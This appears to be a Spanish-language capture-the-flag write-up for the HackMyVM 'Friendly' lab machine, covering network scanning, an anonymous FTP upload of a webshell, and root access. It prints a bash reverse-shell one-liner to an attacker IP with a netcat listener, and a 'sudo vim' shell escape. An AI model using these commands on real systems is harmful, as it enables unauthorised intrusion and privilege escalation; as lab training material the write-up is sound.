Post

Friendly, HACKMYVM

En este reto nos encontramos con escaneo , configuracion erronea en uno de sus servicios y escalado de privilegios con binario.

Este es el primer reto que consiguo hacer solo consultando la web de gotfbins para saber para aprender como usar el binario.

portada

Herramientas y recursos web utilizados

Escaneo

Empezamos averiguando la ip de la maquina victima para ello ejecutamos la herramienta arp-scan nos fijamos en el resultado y buscamos la mac que empieza por 08:00 esa mac es de virtualbox.

Ejecutamos:

1
sudo arp-scan --localnet

arp

Una vez obtenida la ip pasamos al escanear puertos

1
nmap -sC -sV -A -p- --min-rate 5000 $ip

nmap

Intrusion

Vemos que tiene el 21 y el 80 abierto en el 21 tenemos login anonynous y nos permite subir ficheros.

Nos subimos un webshell al servidor que podemos encontrar en github.

Creamos un archivo .html con el siguiente contenido , lo subimos y posteriormente lo ejecutamos a traves del webshell que subimos

1
#!/bin/bash bash -i >& /dev/tcp/192.168.0.112/443 0>&1

webshell

Antes de ejecutar desde el webshell el archivo que subimos debemos ponernos con netcat a la escucha.

1
nc -lnvp 443

nc

Escalada

Una vez con la tty en nuestra maquina atacante buscamos binarios por con permisos para ello probamos primero un :

1
sudo -l

sudo

El binario que nos muestra nos sirve para la escalada de privilegios podemos vistar gtofbins para consulta

Ahora ejecutamos vim como se indica gotfbins.

1
sudo vim -c ':!/bin/sh'

Obtendremos automaticamente root

root

Si os interesan las flags no os olvideis de buscarlas .

Gracias por leer este reto.

This post is licensed under CC BY 4.0 by the author.

Comments powered by Disqus.